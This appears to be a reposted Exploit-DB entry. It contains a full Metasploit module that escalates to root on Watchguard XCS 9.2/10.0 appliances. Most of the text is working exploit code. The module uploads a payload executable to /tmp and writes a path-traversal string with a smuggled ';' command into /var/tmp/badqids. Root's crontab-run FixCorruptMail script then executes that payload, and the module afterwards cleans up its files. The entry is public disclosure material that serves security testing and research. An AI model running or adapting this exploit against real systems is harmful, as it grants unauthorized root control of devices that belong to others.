Watchguard XCS – FixCorruptMail Privilege Escalation (Metasploit)

• Exploit Database
• 102 阅读

• 作者： Metasploit
  日期： 2015-09-28
• 类别：

  • local
  平台：

  • bsd
• 来源：https://www.exploit-db.com/exploits/38347/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  
  require 'msf/core'
  
  class Metasploit4 < Msf::Exploit::Local
  # It needs 3 minutes wait time
  # WfsDelay set to 180, so it should be a Manual exploit,
  # to avoid it being included in automations
  Rank = ManualRanking
  
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
  'Description'=> %q{
  This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
  by root's crontab which can be exploited to run a command as root within 3 minutes.
  },
  'Author' =>
  [
  'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
  ],
  'Platform' => 'bsd',
  'Arch' => ARCH_X86_64,
  'SessionTypes' => ['shell'],
  'Privileged' => true,
  'Targets'=>
  [
  [ 'Watchguard XCS 9.2/10.0', { }]
  ],
  'DefaultOptions' => { 'WfsDelay' => 180 },
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Jun 29 2015'
  ))
  end
  
  def setup
  @pl = generate_payload_exe
  if @pl.nil?
  fail_with(Failure::BadConfig, 'Please select a native bsd payload')
  end
  
  super
  end
  
  def check
  #Basic check to see if the device is a Watchguard XCS
  res = cmd_exec('uname -a')
  return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
  
  Exploit::CheckCode::Safe
  end
  
  def upload_payload
  fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
  
  write_file(fname, @pl)
  return nil unless file_exist?(fname)
  cmd_exec("chmod +x #{fname}")
  
  fname
  end
  
  def exploit
  print_warning('Rooting can take up to 3 minutes.')
  
  #Generate and upload the payload
  filename = upload_payload
  fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
  print_status("Payload #{filename} uploaded.")
  
  #Sets up empty dummy file needed for privesc
  dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
  cmd_exec("touch #{dummy_filename}")
  vprint_status('Added dummy file')
  
  #Put the shell injection line into badqids
  #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
  badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
  fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
  print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
  #cmd_exec(setup_privesc)
  
  #Cleanup the files we used
  register_file_for_cleanup('/var/tmp/badqids')
  register_file_for_cleanup(dummy_filename)
  register_file_for_cleanup(filename)
  end
  
  end